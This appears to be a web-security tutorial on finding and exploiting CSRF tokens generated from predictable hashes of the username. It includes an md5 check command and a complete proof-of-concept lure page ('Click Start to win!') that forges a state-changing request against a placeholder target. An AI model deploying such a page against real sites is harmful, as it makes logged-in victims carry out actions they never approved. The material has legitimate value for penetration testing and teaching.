Exploiting Weak CSRF Tokens

Many web applications do not implement robust token generation algorithms for CSRF (Cross-Site Request Forgery) protection. This note outlines a generic approach to identify and exploit weak CSRF token generation mechanisms, which can be replicated across various web applications.

🔍 Identifying Weak CSRF Tokens

1. Register an Account: Create a user account on the target application.

2. Inspect Requests: Use web developer tools to monitor network requests and identify the CSRF token being used.

3. Analyze Token Generation:

   • Check if the CSRF token is generated using predictable algorithms, such as:

     • md5(username)

     • sha1(username)

     • md5(current date + username)

Example of Token Verification

To verify if the CSRF token is generated from the username, you can calculate the MD5 hash of the username and compare it to the CSRF token value.

echo -n username | md5sum

If the resulting hash matches the CSRF token, it indicates a weak token generation mechanism.

🛠️ Crafting a Malicious Page

Once you identify a weak CSRF token generation mechanism, you can create a malicious page to exploit it. Below is a generic structure for such a page:

Malicious HTML Page

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Proof-of-concept</title>
    <script src="./md5.min.js"></script>
</head>
<body>
    <h1>Click Start to win!</h1>
    <button onclick="trigger()">Start!</button>

    <script>
        let host = 'http://target-application.com';

        function trigger() {
            // Creating/Refreshing the token on the server side.
            window.open(`${host}/app/change-visibility`);
            window.setTimeout(startPoc, 2000);
        }

        function startPoc() {
            // Setting the username
            let hash = md5("victim_username");
            window.location = `${host}/app/change-visibility/confirm?csrf=${hash}&action=change`;
        }
    </script>
</body>
</html>

JavaScript for MD5 Hashing

You will need a JavaScript file for MD5 hashing functionality, which can be included in your malicious page:

// md5.min.js content (as provided in the original example)
!function(n){"use strict";...}(this);

🚀 Executing the Attack

1. Serve the Malicious Page: Use a simple HTTP server to host your malicious page.

   Copy

   python -m http.server 1337

2. Victim Interaction: The victim must be logged into the target application. When they visit your malicious page and click "Start," the CSRF attack will be executed, potentially changing their profile visibility or performing other actions.